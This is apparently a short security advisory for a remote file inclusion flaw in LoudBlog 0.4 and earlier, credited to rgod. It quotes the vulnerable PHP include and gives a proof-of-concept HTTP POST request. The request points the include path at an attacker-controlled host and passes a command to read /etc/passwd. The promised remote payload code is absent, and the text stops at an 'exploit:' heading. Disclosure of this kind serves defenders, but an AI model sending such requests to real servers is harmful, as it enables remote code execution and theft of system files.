------------- LoudBlog <= 0.4 arbitrary remote inclusion ----------- software: site: http://loudblog.de/ description: "Loudblog is a sleek and easy-to-use Content Management System (CMS) for publishing media content on the web. It automatically generates a skinnable website and an RSS-Feed for Podcasting. Just upload your audio/video files, add some notes and links, and you’re done!" -------------------------------------------------------------------- i) vulnerable code in loudblog/inc/backend_settings.php at lines 3-6: ... //change the language if required by POST if (isset($_POST['language'])) { include_once($GLOBALS['path']."/loudblog/lang/".$_POST['language'].".php"); } ... poc: POST [path_to_loudblog]/loudblog/inc/backend_settings.php?cmd=cat%20/etc/passwd&GLOBALS[path]=http://[somehost] HTTP/1.1\r\n"; Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a Host: [target] Content-Length: [data_length] Connection: Close -----------------------------7d529a1d23092a Content-Disposition: form-data; name="language\r\n"; Content-Type: suntzu -----------------------------7d529a1d23092a-- where on http:/[somehost]/loudblog/inc/suntzu.php/index.html, you have code like this: -------------------------------------------------------------------- exploit:
******LoudBlog 4.0 remote commands execution***********
a script by rgod at http://rgod.altervista.org